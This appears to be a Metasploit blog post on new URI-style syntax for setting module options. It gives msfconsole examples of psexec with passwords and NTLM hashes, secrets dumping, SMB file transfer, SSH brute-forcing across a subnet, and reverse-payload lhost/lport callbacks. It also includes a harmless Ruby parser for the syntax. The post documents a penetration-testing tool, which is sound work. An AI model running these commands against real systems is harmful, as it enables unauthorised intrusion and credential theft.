Last updated at Fri, 19 Jan 2024 15:44:57 GMT
Over the past year and a half, Metasploit Framework’s core engineering team in Belfast has made significant improvements to usability, discoverability, and the general quality of life for the global community of Framework users. A few of the enhancements we’ve worked on in MSF 6 include:
- A handy tip command in msfconsole that delivers tips n’ tricks to users
- Consolidated EternalBlue modules that removed the need for Python as a dependency, as well as automatic targeting support
- AutoCheck support, which runs the check functionality of a module before its exploit capabilities are executed to ensure the module will work beforehand, as well as providing a ForceExploit advanced option that allows a user to override this functionality
- A debug command in msfconsole that provides data to help users understand the root cause of issues
- Improved cross-platform support for msfdb, as well as supporting external databases — such as using a PostgreSQL Docker container
- User experience improvements, including word-wrapping tables, highlighting matched search terms in the search table, and introducing context-aware hints — such as letting users know that they can use the use command to easily select a searched module
- Reducing msfconsole’s boot time, as well as reducing the time required to search for modules and list exploits/payloads in both the console and module.search RPC calls
Today's blog looks at another series of improvements that have overhauled Framework's option support to allow for streamlined workflows when specifying multiple module options for protocols like HTTP, MySQL, PostgreSQL, SMB, SSH, and more. This removes the need to individually call set for each module option value before running it — courtesy of pull request #15253.
Overview
Traditional usage of Metasploit involves loading a module and setting multiple options:
use exploit/linux/postgres/postgres_payload
set username administrator
set password pass
set rhost 192.168.123.6
set rport 5432
set database postgres
set lhost 192.168.123.1
set lport 5000
run
You could also specify multiple RHOSTS separated by spaces, or with a CIDR subnet mask:
set rhosts 127.0.0.1 127.0.0.2
set rhosts 127.0.0.1/24
URI support for RHOSTS
As of Metasploit 6.1.4, users can now supply URI strings as arguments to the run command to specify RHOST values and option values at once:
use exploit/linux/postgres/postgres_payload
run postgres://administrator:pass@192.168.123.6 lhost=192.168.123.1 lport=5000
This new workflow will not only make it easier to use reverse-i-search with CTRL+R in Metasploit's console — it will also make it easier to share cheat sheets among pentesters.
SMB examples
There's a full page of documentation and examples in the Metasploit Wiki, but here are a few highlights that show the improvements.
Running psexec against a target host:
use exploit/windows/smb/psexec
run smb://user:pass8@192.168.123.13 lhost=192.168.123.1 lport=5000
run "smb://user:pass with spaces!123$@192.168.123.13" lhost=192.168.123.1 lport=5000
Running psexec with NTLM hashes:
use exploit/windows/smb/psexec
run smb://Administrator:aad3b4...:32693...@10.10.10.161 lhost=10.10.14.13 lport=5000
Dumping secrets with NTLM hashes:
use auxiliary/gather/windows_secrets_dump
run smb://Administrator:aad3b4...:32693...@10.10.10.161
Downloading a file:
use auxiliary/admin/smb/download_file
run smb://a:p4$$w0rd@192.168.123.13/my_share/helloworld.txt
Uploading a file:
use auxiliary/admin/smb/upload_file
echo "my file" > local_file.txt
run smb://a:p4$$w0rd@192.168.123.13/my_share/remote_file.txt lpath=./local_file.txt
SSH examples
If you have valid SSH credentials, the ssh_login module will open a Metasploit session for you:
use scanner/ssh/ssh_login
run ssh://user:pass@172.18.102.20
Brute-force a host with a known user and a password list:
use scanner/ssh/ssh_login
run ssh://known_user@192.168.222.1 threads=50 pass_file=./rockyou.txt
Brute-force credentials:
use scanner/ssh/ssh_login
run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
Brute-force credentials in a subnet:
use scanner/ssh/ssh_login
run cidr:/24:ssh://user:pass@192.168.222.0 threads=50
run cidr:/24:ssh://user@192.168.222.0 threads=50 pass_file=./rockyou.txt
It's also now possible to port forward through a Metasploit SSH session:
route add 172.18.103.0/24 ssh_session_id
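To make the syntax used throughout the postgres, SMB and SSH examples above concrete, here is a small Ruby parser, written for this post as an added example and not Metasploit's own implementation, that turns a run line into a hash of option names. It handles the pieces the examples rely on: a quoted password containing spaces, an LM:NT hash in the password position, a share and file path after the host for SMB, the cidr:/N: prefix, and trailing key=value overrides. The option names it emits (USERNAME, PASSWORD, RHOSTS, RPORT, SMBSHARE, RPATH, TARGETURI) and the per-scheme default ports are assumptions of this example; real modules define their own option names and defaults.

```ruby
require 'shellwords'

# Assumed default ports for the schemes the post lists. Real modules take
# RPORT from their own option definitions; these are only for the example.
DEFAULT_PORTS = {
  'http' => 80, 'https' => 443, 'mysql' => 3306,
  'postgres' => 5432, 'smb' => 445, 'ssh' => 22
}.freeze

# Parse a "run <uri> key=value ..." line (the leading "run" is optional)
# into a hash of upper-cased option names. This is a toy reimplementation of
# the workflow the post describes, not Metasploit's parser.
def parse_run_args(line)
  tokens = Shellwords.split(line)           # honours "..." around a password with spaces
  tokens.shift if tokens.first == 'run'
  raise ArgumentError, 'no URI given' if tokens.empty?

  uri  = tokens.shift
  opts = {}

  # Optional cidr:/N: prefix widens the RHOSTS value to a subnet
  cidr = nil
  if (m = uri.match(%r{\Acidr:(/\d{1,2}):(.*)\z}))
    cidr = m[1]
    uri  = m[2]
  end

  m = uri.match(%r{\A([a-z]+)://(.*)\z})
  raise ArgumentError, "not a URI: #{uri}" unless m
  scheme, rest = m[1], m[2]
  raise ArgumentError, "unsupported scheme: #{scheme}" unless DEFAULT_PORTS.key?(scheme)

  # Split userinfo from the host part on the LAST '@' so a password may contain '@'.
  # Split user from password on the FIRST ':' so an LM:NT hash stays in one piece.
  if (at = rest.rindex('@'))
    userinfo = rest[0...at]
    rest     = rest[(at + 1)..-1]
    user, _sep, pass = userinfo.partition(':')
    opts['USERNAME'] = user unless user.empty?
    opts['PASSWORD'] = pass unless pass.empty?
  end

  # host[:port][/path]  (IPv4 or hostname only; IPv6 literals are not handled here)
  hostport, _sep, path = rest.partition('/')
  host, _sep, port = hostport.partition(':')
  raise ArgumentError, 'missing host' if host.empty?
  opts['RHOSTS'] = cidr ? "#{host}#{cidr}" : host
  opts['RPORT']  = port.empty? ? DEFAULT_PORTS[scheme] : Integer(port, 10)

  # For SMB the first path segment is the share and the remainder the file;
  # for other schemes keep the whole path (option names are this example's choice)
  unless path.empty?
    if scheme == 'smb'
      share, _sep, file = path.partition('/')
      opts['SMBSHARE'] = share
      opts['RPATH']    = file unless file.empty?
    else
      opts['TARGETURI'] = "/#{path}"
    end
  end

  # Trailing key=value pairs add or override options, as in the post's examples
  tokens.each do |tok|
    key, sep, value = tok.partition('=')
    raise ArgumentError, "expected key=value, got #{tok}" if sep.empty? || key.empty?
    opts[key.upcase] = value
  end

  opts
end

if __FILE__ == $PROGRAM_NAME
  p parse_run_args('run "smb://user:pass with spaces!123$@192.168.123.13" lhost=192.168.123.1 lport=5000')
  p parse_run_args('cidr:/24:ssh://user@192.168.222.0 threads=50 pass_file=./rockyou.txt')
end
```

The two split choices are what make the examples above work: taking the last '@' lets a password contain '@', and taking only the first ':' in the userinfo keeps an LM:NT hash pair intact as the password value, which is why the psexec and secrets_dump lines can pass hashes where a password would normally go.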
More examples
Full details and examples can be found within the Metasploit Wiki. At the time of release, the following protocols are now supported:
- cidr - Can be combined with other protocols to specify address subnet mask length
- file - Load a series of RHOST values separated by newlines from a file (this file can also include URI strings)
- http
- https
- mysql
- postgres
- smb
- ssh